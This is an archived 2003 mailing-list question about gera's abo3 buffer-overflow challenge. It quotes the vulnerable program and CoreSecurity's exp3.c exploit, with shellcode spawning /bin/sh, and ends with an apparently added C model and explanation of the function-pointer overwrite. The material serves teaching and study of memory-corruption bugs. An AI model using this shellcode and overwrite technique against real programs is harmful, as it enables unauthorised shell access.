Abo3 (can someone help me?)

From: Discussion Lists <discussions(at)lagraphico.com>
Date: Sun May 25 2003 - 00:11:20 EDT


Hi all,
This list has become far more interesting with the challenges. Thanks to all for the participation. Recently, a user posted a particular site:

http://community.core-sdi.com/~gera/InsecureProgramming/abo3.html

Which has the following code:

/* abo3.c                                       *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step */

int main(int argv,char **argc) {

	extern system,puts;
	void (*fn)(char*)=(void(*)(char*))&system;
	char buf[256];			/* 256-byte stack buffer */

	fn=(void(*)(char*))&puts;
	strcpy(buf,argc[1]);		/* unbounded copy of the first argument: overflows buf */
	fn(argc[2]);			/* the function pointer is used here, after the copy */
	exit(1);			/* never returns, so the saved return address is never used */

}

The issue here is that there is an exit(1) at the end of the code. So even if you were to overwrite the return address, it would not matter because there is no return (if I understand correctly).

The solution, according to this place:


http://www.core-sec.com/examples/core_vulnerabilities.pdf

is that we have to stick our shellcode in an environment variable, then overwrite the address of that variable into the address of the fn() function. So they lay out the following code to do it (questions in-line):

/*
** exp3.c
** Coded by CoreSecurity - info@core-sec.com
**/

#include <string.h>
#include <unistd.h>

#define BUFSIZE 261

/* Why 261? The vulnerable program allocates 256 I thought. Where is
that other 5 going to/for? */

/* 24 bytes shellcode */

char shellcode[]=
        /*  1       P    h  \   \   s   h    h  \   b    i  */
	"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
	/* n           P  2                */
	"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* so it is pushing /bin/sh backwards on the stack. Aleph1 talks about
how to create this code so I won't ask about it */

int main(void) {
	char *env[3] = {shellcode, NULL};
	char evil_buffer[BUFSIZE];
	char *p;

	/* Calculating address of shellcode */
	int ret = 0xbffffffa - strlen(shellcode) -
	          strlen("/home/user/gera/abo3");
	/* That is what I don't get. First, what is the 0xbffffffa address? Is
	that where supposedly the ending address of the code when everything is
	pushed onto the stack? I believe strlen calculates the length of a
	string? If that is the case, why do they need to calculate shellcode,
	and the path. I also assume the path is case specific. In other words,
	if the binary has a different path on my system, I would use that
	instead. */

	/* constructing the buffer */
	p = evil_buffer;
	memset(p, 'B', 256);	// Some junk
	p += 256;

	*((void **)p) = (void *) (ret);	/* 32-bit target: a 4-byte pointer */
	p += 4;
	*p = '\0';

	/* Two arguments are passed to the vulnerable program */
	execle("/home/user/gera/abo3", "abo3", evil_buffer, "A",
	       NULL, env);
	return 0;
}

I don't completely understand much of that last part either, but I have the K&R book, so I will drag it out and see what I can find out.

Received on Sun May 25 23:34:50 2003
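The three questions in the post (why the buffer is 261 bytes, what the 0xbffffffa arithmetic computes, and why overwriting fn works even though main() never returns) can be checked with the following added example. It is not part of the original post or of CoreSecurity's exploit: it reproduces exp3.c's address arithmetic and payload layout as plain functions, adds the one check exp3.c relies on silently (the address bytes must contain no NUL, or strcpy stops early), and models abo3's frame as a hypothetical struct with `buf` directly below `fn`, so the function-pointer overwrite can be demonstrated deterministically without an executable stack or real shellcode. `legit()` and `hijacked()` stand in for puts and the shellcode; `STACK_TOP` is exp3.c's constant, and `struct frame` and the function names are assumptions made for this example, not symbols from the page.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JUNK 256                 /* abo3's buf[256] */
#define STACK_TOP 0xbffffffaU    /* exp3.c's constant: end of the program path
                                    at the top of the 32-bit Linux stack */

/* exp3.c's address arithmetic: with the shellcode as the only environment
 * string it sits directly below the program path, so its address is the
 * stack-top constant minus both string lengths. */
uint32_t env_shellcode_addr(size_t shellcode_len, size_t path_len)
{
    return STACK_TOP - (uint32_t)shellcode_len - (uint32_t)path_len;
}

/* Store a 32-bit address little-endian, the way x86 keeps it in memory. */
void le32(unsigned char out[4], uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (8 * i));
}

/* Payload layout: JUNK filler, the address bytes, then the NUL that ends
 * the string. Returns the total length: 256 + 4 + 1 = 261 for a 32-bit
 * address, which is exp3.c's BUFSIZE. Returns 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t outlen,
                     const unsigned char *addr, size_t addr_len)
{
    size_t need = JUNK + addr_len + 1;
    if (outlen < need)
        return 0;
    memset(out, 'B', JUNK);
    memcpy(out + JUNK, addr, addr_len);
    out[JUNK + addr_len] = '\0';
    return need;
}

/* strcpy stops at the first NUL it reads, so the address bytes must be
 * NUL-free or only part of the pointer is overwritten. Returns 1 when every
 * byte before the terminator is non-zero. */
int strcpy_carries(const unsigned char *payload, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (payload[i] == '\0')
            return 0;
    return 1;
}

/* ---- deterministic model of abo3's frame (hypothetical layout) ---- */

static const char *last_arg;      /* what the called function received */
static int hijacked_ran;

void legit(char *s)    { last_arg = s; }                   /* stands in for puts */
void hijacked(char *s) { last_arg = s; hijacked_ran = 1; } /* stands in for the shellcode */

/* buf sits directly below fn, as in abo3; slack receives the terminating
 * NUL the way whatever lies above fn does in the real frame. */
struct frame {
    char buf[JUNK];
    void (*fn)(char *);
    char slack[16];
};

/* abo3 in miniature: fn starts out pointing at legit(), the copy runs past
 * buf into fn, then fn(arg) is called. main() never returning does not
 * matter because the corrupted pointer is used before that. Returns 1 if
 * hijacked() ran, 0 if legit() ran, -1 if the payload does not fit.
 * The copy is a bounded memcpy so the model is deterministic on any host;
 * strcpy_carries() is the separate check that strcpy would deliver the
 * same bytes. */
int run_overflowed_frame(const unsigned char *payload, size_t len, char *arg)
{
    struct frame fr;
    if (len > sizeof fr || offsetof(struct frame, fn) != JUNK)
        return -1;
    hijacked_ran = 0;
    fr.fn = legit;
    memcpy(&fr, payload, len);   /* the overflow: bytes 256.. land on fn */
    fr.fn(arg);
    return hijacked_ran;
}

int main(void)
{
    unsigned char payload[JUNK + sizeof(void (*)(char *)) + 1];
    unsigned char addr[4];
    uint32_t a = env_shellcode_addr(24, strlen("/home/user/gera/abo3"));
    size_t n;

    /* exp3.c's numbers: 24-byte shellcode, 20-byte path */
    le32(addr, a);
    n = build_payload(payload, sizeof payload, addr, sizeof addr);
    printf("shellcode at 0x%08x, payload %zu bytes, NUL-free: %d\n",
           (unsigned)a, n, strcpy_carries(payload, n));

    /* the same overwrite against the model, using a real pointer on this host */
    void (*target)(char *) = hijacked;
    n = build_payload(payload, sizeof payload,
                      (const unsigned char *)&target, sizeof target);
    printf("fn hijacked: %d, argument seen: %s\n",
           run_overflowed_frame(payload, n, "A"), last_arg);
    return 0;
}
```

So the 261 is 256 bytes of filler to reach fn, 4 bytes for the address that replaces it, and 1 byte for the NUL that strcpy appends. The 0xbffffffa constant is where, on a 32-bit Linux of that era without stack randomization, the kernel's copy of the execve path ends; the environment strings are placed directly beneath it, so with the shellcode as the only environment variable its start is that constant minus strlen(shellcode) minus strlen(path). That is why the exploit subtracts both lengths, why the path must be the binary's real path on the target, and why the constant itself is host-specific. The NUL check matters for the same reason on any host: a 64-bit user-space pointer has zero high bytes, so strcpy could never carry it whole, which is also why this model copies with a bounded memcpy and keeps the strcpy check separate.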

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT